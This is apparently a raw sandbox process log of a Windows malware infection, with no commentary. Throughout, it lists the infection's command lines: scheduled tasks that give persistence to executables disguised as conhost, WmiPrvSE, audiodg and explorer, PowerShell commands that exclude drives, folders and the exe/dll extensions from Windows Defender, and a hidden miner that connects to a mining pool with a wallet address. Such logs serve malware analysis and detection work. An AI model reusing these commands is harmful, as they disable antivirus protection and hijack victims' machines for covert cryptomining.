schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Admin\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdf" /sc ONLOGON /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\winNet\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\winNet\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\winNet\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /f

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\spoolsv.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\es-ES\cmd.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\WmiPrvSE.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\sddsfsdf.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "25272683852682421217750818191465220422-9407692802057673643-1748207935997404968"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-3052900611401125956-484756809-446905200-241649272-9487792602012423663809889304"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-271828083-4359111451189210716-1289684993802507662-1364957067213309067794720591"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Idle.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Prefetch\ReadyBoot\explorer.exe'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-961920636-98148811797934006976321607617681184272034308288-170282153-1921298572"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "17658125455922931561755729633-139957246824629125618701358-956132470-1241721211"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DnAvjBEOV3.bat"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\Bloxstrap.exe

C:\Users\Admin\Bloxstrap.exe

C:\winNet\wscript.exe

"C:\winNet\wscript.exe"

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\A9jUK9Ae8C.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe

"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "9039321941113196100-17247621085065542758533708-1634550024-1281521765-1306536162"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "10458232041309704218-977340461-1780344133-86343893013835761481943200512-1196967907"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-159992700111601998421866752664-655342536248805395706532405-415879957-1927639054"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1868810344-2048948033666806126-43626291359636690543060264-744249752-158698289"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "556020493-644620438739739999-66581829111512784121609637097-815839047-163052952"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1104225558976001055-81118590965226475117268917871455293840-1939095154-500938075"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1678502449-437097632901073378-156327449315826618-12647697901638505465-533490980"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

